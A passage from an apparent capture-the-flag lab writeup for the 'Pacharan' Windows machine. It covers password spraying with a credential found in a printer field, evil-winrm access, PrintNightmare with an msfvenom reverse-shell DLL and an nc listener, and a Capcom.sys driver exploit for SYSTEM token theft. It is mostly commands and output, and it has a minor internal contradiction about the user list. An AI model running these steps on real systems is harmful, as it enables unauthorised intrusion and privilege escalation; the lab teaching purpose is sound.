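        with open(sys.argv[1]) as kb, open(sys.argv[2]) as rb:
            users = build_spray_list(kb.read().splitlines(), rb.read().splitlines())
    else:
        users = build_spray_list()
    print("\n".join(users))
```

The output keeps "Chivas Regal" as one entry with the space, which crackmapexec reads fine from a -u file (quote it if you pass it on the command line instead), and lists each account once regardless of how many case variants kerbrute reported.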
Note that the list contains "Chivas" twice: cutting on spaces truncated the account "Chivas Regal" (the full name shows up in the spray below), so the list needs that entry corrected by hand. Now enumerate the printers over MS-RPRN; the share comment "Soy Hacker y arreglo impresoras" already hinted at a printer worth a look:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumprinters'
flags:[0x800000]
name:[\\192.168.69.69\Soy Hacker y arreglo impresoras]
description:[\\192.168.69.69\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
comment:[Soy Hacker y arreglo impresoras]
The printer's description field holds what looks like a password, TurkisArrusPuchuchuSiu1. By convention that field reads "\\server\printer,driver,location", so someone put a credential in the printer's location. Spray it against the full user list:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u valid_users.txt -p TurkisArrusPuchuchuSiu1 --continue-on-success |grep +
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1
The spray matches the account "Chivas Regal" (the full name, with the space, that the cut-based list had truncated). Log in with evil-winrm:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u 'Chivas Regal' -p 'TurkisArrusPuchuchuSiu1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
SMB enumeration already showed a printer, and the spooler answered the rpcclient query above, so the next step is the Print Spooler vulnerability CVE-2021-34527 (PrintNightmare), which lets any authenticated domain user have the spooler service load a DLL of their choosing as SYSTEM.
Exploit script: https://github.com/JohnHammond/CVE-2021-34527
Since this is a writeup I go straight to the steps.
First confirm that the spooler RPC interfaces are exposed:
┌──(kali㉿kali)-[~/thl/Pacharan]
└─$ impacket-rpcdump @192.168.69.69 | grep -E 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Both interfaces are registered, so the spooler is running. Now generate a reverse-shell DLL with msfvenom and upload it through evil-winrm. The listener used below is plain nc, so the payload must be a stageless shell (a staged meterpreter payload would need msfconsole's multi/handler instead):
msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.69.3 lport=4455 -f dll -o reverse.dll
Copy it to a directory that is writable by default on Windows and readable by the spooler (a list of such paths: https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md):
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> cp reverse.dll C:\Windows\Tasks\reverse.dll
Upload the exploit module, import it, and run it against the DLL; the spooler loads the DLL as SYSTEM and it connects back:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/CVE-2021-34527.ps1
Info: Uploading /home/kali/thl/Pacharan/CVE-2021-34527.ps1 to C:\Users\Chivas Regal\Documents\CVE-2021-34527.ps
Data: 238084 bytes of 238084 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> ls
Directorio: C:\Users\Chivas Regal\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/4/2024 3:53 PM 295936 6666.exe
-a---- 12/4/2024 8:42 PM 178563 CVE-2021-34527.ps1
-a---- 12/4/2024 8:26 PM 9216 reverse.dll
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Import-Module .\CVE-2021-34527.ps1
On the attacker, start the listener first:
nc -lvnp 4455
Then, back in the evil-winrm session:
Invoke-Nightmare -DLL 'C:\Windows\Tasks\reverse.dll'
The listener receives a SYSTEM shell:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# nc -lvnp 4455
listening on [any] 4455 ...
connect to [192.168.69.3] from (UNKNOWN) [192.168.69.69] 49194
Microsoft Windows [Versión 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
c:\Users\Chivas Regal\Desktop>type user.txt
type user.txt
bb8b4df8eda73e75ca51ca88a909c1cb -
c:\Users\Administrador\Desktop>type root.txt
type root.txt
cfa7cb1cc20e26c0428f9222d44c76a0 -
whoami /priv in the Chivas Regal session shows a second route to SYSTEM: the account holds SeLoadDriverPrivilege.
That privilege lets a user load and unload kernel drivers through NtLoadDriver.
It is normally held only by administrators (and, by default, the Print Operators group), because loading a signed but vulnerable driver is kernel code execution.
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> whoami /priv
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripción Estado
============================= =============================================== ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeLoadDriverPrivilege Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
The tooling for this (ExploitCapcom.exe, eoploaddriver_x64.exe and the vulnerable, validly signed Capcom.sys driver) can be obtained from here.
Upload the three files:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/ExploitCapcom.exe
Info: Uploading /home/kali/thl/Pacharan/ExploitCapcom.exe to C:\Users\Chivas Regal\Documents\ExploitCapcom.exe
Data: 387752 bytes of 387752 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/eoploaddriver_x64.exe
Info: Uploading /home/kali/thl/Pacharan/eoploaddriver_x64.exe to C:\Users\Chivas Regal\Documents\eoploaddriver_x64.exe
Data: 92840 bytes of 92840 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload /home/kali/thl/Pacharan/Capcom.sys
Info: Uploading /home/kali/thl/Pacharan/Capcom.sys to C:\Users\Chivas Regal\Documents\Capcom.sys
Data: 14100 bytes of 14100 bytes copied
Info: Upload successful!
Load the vulnerable driver. It was uploaded to Documents but is loaded from C:\Windows\Tasks, so copy it there first (as was done with reverse.dll). Note the registry path in the output: without admin rights the service key cannot be created under HKLM\SYSTEM\CurrentControlSet\Services, so the loader creates it under the user's own hive (\Registry\User\<SID>\...) and passes that path to NtLoadDriver, which accepts it because the caller holds SeLoadDriverPrivilege. The key name is not rendered correctly in the capture below.
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> .\ExploitCapcom.exe LOAD c:\windows\tasks\Capcom.sys
[*] Service Name: drlynhqu
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\?????????????????
NTSTATUS: 00000000, WinError: 0
Exploit the loaded driver: Capcom.sys executes code handed to it from user mode in ring 0, which the tool uses to steal the SYSTEM token and run a command with it:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> .\ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 00000239224D0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system